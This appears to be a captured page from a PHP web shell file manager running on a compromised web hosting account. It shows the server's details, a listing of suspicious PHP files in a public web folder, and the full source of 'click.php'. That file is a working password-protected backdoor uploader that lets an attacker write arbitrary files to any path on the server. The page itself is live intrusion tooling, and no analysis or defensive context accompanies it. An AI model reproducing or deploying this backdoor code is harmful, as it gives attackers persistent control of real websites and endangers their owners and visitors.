[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
home
/
persadamedika
/
public_html
/
mobile
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 .well-known
SET
[ DEL ]
📁 0a3946
SET
[ DEL ]
📁 356cc0
SET
[ DEL ]
📁 e7160
SET
[ DEL ]
📁 feb68
SET
[ DEL ]
📁 nextjs
SET
[ DEL ]
📁 wp-content
SET
[ DEL ]
📄 .htaccess
236 B
SET
[ EDIT ]
|
[ DEL ]
📄 0x1949XCNRU4.php
4,218 B
SET
[ EDIT ]
|
[ DEL ]
📄 OVA-TOOLS-VIP.php
19,522 B
SET
[ EDIT ]
|
[ DEL ]
📄 click.php
1,323 B
SET
[ EDIT ]
|
[ DEL ]
📄 defaults.php
1,910 B
SET
[ EDIT ]
|
[ DEL ]
📄 error_log
143,419,435 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
12,666 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php0
12,666 B
SET
[ EDIT ]
|
[ DEL ]
📄 item.php
1,980 B
SET
[ EDIT ]
|
[ DEL ]
📄 mah.php
2,043 B
SET
[ EDIT ]
|
[ DEL ]
📄 options.php
1,910 B
SET
[ EDIT ]
|
[ DEL ]
📄 robots.txt
396 B
SET
[ EDIT ]
|
[ DEL ]
📄 search.php
1,495 B
SET
[ EDIT ]
|
[ DEL ]
📄 txets.php
4,478 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: click.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == 'a1fecbae6a303e0618f95586ddb49de7c30f911fecd8701500320daf754868a0') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php echo('kill_the_net'); $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>